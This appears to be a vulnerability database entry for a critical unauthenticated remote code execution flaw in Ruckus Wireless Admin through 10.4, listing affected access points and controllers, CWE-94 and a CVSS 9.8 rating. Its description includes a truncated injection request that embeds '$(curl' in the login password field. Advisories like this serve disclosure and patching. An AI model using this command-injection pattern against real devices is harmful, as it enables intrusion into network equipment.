Description


Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Related CPE's


a

ruckuswireless

ruckus_wireless_admin

8

o

ruckuswireless

smartzone_ap

4

h

ruckuswireless

e510

2

h

ruckuswireless

h320

2


h

ruckuswireless

h510

2


h

ruckuswireless

m510

2

h

ruckuswireless

r310

2

h

ruckuswireless

r320

2


h

ruckuswireless

r510

2

h

ruckuswireless

r550

2

h

ruckuswireless

r610

2

h

ruckuswireless

r650

2

h

ruckuswireless

r710

2

h

ruckuswireless

r720

2

h

ruckuswireless

r730

2

h

ruckuswireless

r750

2


h

ruckuswireless

r850

2

h

ruckuswireless

sz-144

3

h

ruckuswireless

sz100

2

h

ruckuswireless

sz300

3

h

ruckuswireless

t310c

2

h

ruckuswireless

t310d

2

h

ruckuswireless

t310n

2

h

ruckuswireless

t310s

2




h

ruckuswireless

t610

2

h

ruckuswireless

t710

2

h

ruckuswireless

t710s

2

h

ruckuswireless

t750

2

h

ruckuswireless

t750se

2

h

ruckuswireless

t811-cm

2











o

ruckuswireless

smartzone

3













Weaknesses



CWE-94


CWE-94

CVSS impact metrics


CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 · Critical

  • CVSS V3.1

  • CVSS V3.0

  • CVSS V2.0

Information


Source identifier

[email protected]

Vulnerability status

Analyzed

Published

2023-02-13T20:15:10.973

2 years ago

Last modified

2025-03-10T20:48:20.863

1 month ago